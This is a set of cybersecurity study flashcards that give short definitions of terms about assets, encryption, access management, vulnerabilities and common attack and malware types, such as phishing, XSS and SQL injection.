Assets, Threats, & Vulnerabilities Flashcards
1
Q
Asset
A
item perceived as having value to an organization
2
Q
Asset inventory
A
catalog of assets that need to be protected
3
Q
Asset classification
A
practice of labeling assets based on sensitivity and importance to an organization
4
Q
Asset management
A
process of tracking assets and the risks that affect them
5
Q
Compliance
A
process of adhering to internal standards and external regulations
6
Q
Data
A
information that is translated, processed, or stored by a computer
7
Q
Data at rest
A
data not currently being accessed
8
Q
Data in transit
A
data traveling from one point to antoher
9
Q
Data in use
A
data being accessed by one or more users
10
Q
Information security (InfoSec)
A
practice of keeping data in all states away from unauthorized users
11
Q
National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF)
A
voluntary framework that consists of standards, guidelines, and best practices to manage cybersecurity risk
12
Q
Policy
A
set of rules that reduce risk and protect information
13
Q
Procedures
A
step-by-step instructions to perform a specific security task
14
Q
Regulations
A
Rules set by a government or other authority to control the way something is done
15
Q
Risk
A
Anything that can impact confidentiality, integrity, and availability of an asset
16
Q
Standards
A
References that inform how to set policies
17
Q
Threat
A
Any circumstances or event that can negatively impact assets
18
Q
Vulnerability
A
weakness that can be exploited by a threat
19
Q
Access controls
A
security controls that manage access, authorization, and accountability of information
20
Q
Algorithm
A
set of rules used to solve a problem
21
Q
Application programming interface (API) token
A
small block of encrypted code that contains information about a user
22
Q
Asymmetric encryption
A
use of public and private key pair for encryption and decryption of data
23
Q
Basic auth
A
technology used to establish a user’s request to access a server
24
Q
Bit
A
smallest unit of data measurement on a computer
25
Brute force attack
the trial and error process of discovering private information
26
Cipher
algorithm that encrypts information
27
Cryptographic key
mechanism that decrypts ciphertext
28
Cryptography
process of transforming information into a form that unintended readers can't understand
29
Data custodian
Anyone or anything that's responsible for the safe handling, transport, and storage of information
30
Data owner
person that decides who can access, edit, use, or destroy their information
31
Digital certificate
a file that verifies the identity of a public key holder
32
Encryption
process of converting data from a readable format to an encoded format
33
Hash collision
instance when different inputs produce the same hash value
34
Hash table
data structure that's used to store and reference hash values
35
Hash function
algorithm that produces a code that can't be decrypted
36
Identity and access management (IAM)
collection of processes and technologies that helps organizations manage digital identities in their environment
37
Information privacy
protection of unauthorized access and distribution of data
38
Multi-factor authentication (MFA)
A security measure that requires a user to verify their identity in two or more ways to access a system or network
39
Non-repudiation
concept that the authenticity of information can't be denied
40
OAuth
open-standard authorization protocol that shares designated access between applications
41
Payment Card Industry Data Security Standards (PCI DSS)
set of security standards formed by major organizations in the financial industry
42
Personally identifiable information (PII)
Any information used to infer an individual's identity
43
Principle of least privilege
concept of granting only the minimal access and authorization required to complete a task or function
44
Protected health information (PHI)
Information that relates to the past, present, or future physical or mental health or condition of an individual
45
Public key infrastructure (PKI)
encryption framework that secures the exchange of online information
46
Rainbow table
file of pre-generated hash values and their associated plaintext
47
Salting
additional safeguard that's used to strengthen hash functions
48
Security assessment
check to determine how resilient current security implementations are against treats
49
Security audit
review of an organization's security controls, policies, and procedures against a set of expectations
50
Security controls
safeguards designed to reduce specific security risks
51
Separation of duties
principle that users should not be given levels of authorization that would allow them to misuse a system
52
Session
sequence of network HTTP basic auth requests and responses associated with the same user
53
Session cookie
token that websites use to validate a session and determine how long that session should last
53
Session hijacking
event when attackers obtain a legitimate user's session ID
54
Session ID
unique token that identifies a user and their device while accessing a system
55
Single Sign-On (SSO)
technology that combines several different logins into one
56
Symmetric encryption
use of a single secret key to exchange information
57
user provisioning
process of creating and maintaining a user's digital identity
58
Advanced persistent threat APT
instance when a threat actor maintains unauthorized access to a system for an extended period of time
59
Attack surface
all the potential vulnerabilities that a threat actor could exploit
60
Attack tree
diagram that maps threats to assets
61
Attack vector
pathways attackers use to penetrate security defenses
62
Bug bounty
Programs that encourage freelance hackers to find and report vulnerabilities
63
Common Vulnerabilities and Exposures CVE list
openly accessible dictionary of known vulnerabilities and exposures
64
Common Vulnerability Scoring System CVSS
measurement system that scores the severity of a vulnerability
65
CVE Numbering Authority CNA
organization that volunteers to analyze and distribute information on eligible CVEs
66
Defense in depth
layered approach to vulnerability management that reduces risk
67
Exploit
way of taking advantage of a vulnerability
68
Exposure
mistake that can be exploited by a threat
69
Hacker
any person who uses computers to gain access to computer systems, networks, or data
70
MITRE
collection of non-profit research and development centers
71
Security hardening
process of strengthening a system to reduce its vulnerability and attack surface
72
Threat actor
any person or group who presents a security risk
73
Vulnerability
weakness that can be exploited by a threat
74
Vulnerability assessment
internal review process of a company's security systems
75
Vulnerability management
process of finding and patching vulnerabilities
76
Vulnerability scanner
software that automatically compares existing common vulnerabilities and exposures against the technologies on the network
77
Zero-day
an exploit that was previously unknown
78
Angler phishing
technique where attackers impersonate customer service reps on social media
79
Advanced persistent threat APT
instances when a threat actor maintains unauthorized access to a system for an extended period of time
80
Adware
type of legitimate software that is sometimes used to display digital advertisements in applications
81
Attack tree
diagram that maps threats to assets
82
Baiting
social engineering tactic that tempts people into compromising their security
83
Botnet
collection of computers infected by malware that are under the control of a single threat actor, known as the bot-herder
84
Cross-site scripting XSS
injection attack that inserts code into a vulnerable website or web application
85
DOM-based XSS attack
instance when malicious script exists in the webpage a browser loads
86
Cryptojacking
form of malware that installs software to illegally mine cryptocurrencies
87
Dropper
type of malware that comes packed with malicious code which is delivered and installed onto a target system
88
Fileless malware
malware that does not need to be installed by the user because it uses legitimate programs that are already installed to infect a computer
89
Hacker
any person or group who uses computers to gain unauthorized access to data
90
Identity and access management IAM
collection of processes and technologies that helps organizations manage digital identities in their environment
91
Injection attack
Malicious code inserted into a vulnerable application
92
Input validation
programming that validates inputs from users and other programs
93
Intrusion detection system IDS
application that monitors system activity and alerts on possible intrusions
94
Loader
type of malware that downloads strains of malicious code from an external source and installs them onto a target system
95
Malware
software designed to harm devices or networks
96
Process of Attack Simulation and Threat Analysis PASTA
popular threat modeling framework that's used across many industries
97
Phishing
use of digital communications to trick people into revealing sensitive data or deploying malicious software
98
Phishing kit
collection of software tools needed to launch a phishing campaign
99
prepared statement
coding technique that executes SQL statements before passing them onto the database
100
Potentially unwanted application PUA
type of unwanted software that is bundled in with legitimate programs which might display ads, cause device slowdown, or install other software
101
Quid pro quo
type of baiting used to trick someone into believing that they'll be rewarded in return for sharing access, info, or money
102
Ransomware
type of malicious attack where attackers encrypt an organization's data and demand payment to restore access
103
Reflected XSS attack
instance when malicious script is sent to a server and activated during the server's response
104
Rootkit
malware that provides remote, administrative access to a computer
105
Scareware
Malware that employs tactics to frighten users into infecting their device
106
Smishing
use of text messages to trick users to obtain sensitive info or to impersonate a known source
107
Social engineering
manipulation technique that exploits human error to gain private info, access, or valuables
108
Spear phishing
malicious email attack targeting a specific user or group of users, appearing to originate from a trusted source
109
Spyware
malware that is used to gather and sell info without consent
110
SQL Structured query language
programming language used to create, interact with, and request info from a database
111
SQL injection
an attack that executes unexpected queries on a database
112
Stored XSS attack
instance when malicious script is injected directly on the server
113
Tailgaiting
social engineering tactic in which unauthorized people follow an authorized person into a restricted area
114
Threat
any circumstance or event that can negatively impact assets
115
threat actor
any person or group who presents a security risk
116
threat modeling
process of identifying assets, their vulnerabilities, and how each is exposed to threats
117
Trojan horse
malware that looks like a legitimate file or program
118
Vishing
exploitation of electronic voice communication to obtain sensitive info or to impersonate a known source
119
Watering hole attack
type of attack when a threat actor compromises a website frequently visited by a specific group of users
120
Whaling
category of spear phishing attempts that are aimed at high-ranking executives in an organization
121
Web-based exploits
malicious code or behavior that's used to take advantage of coding flaws in a web application
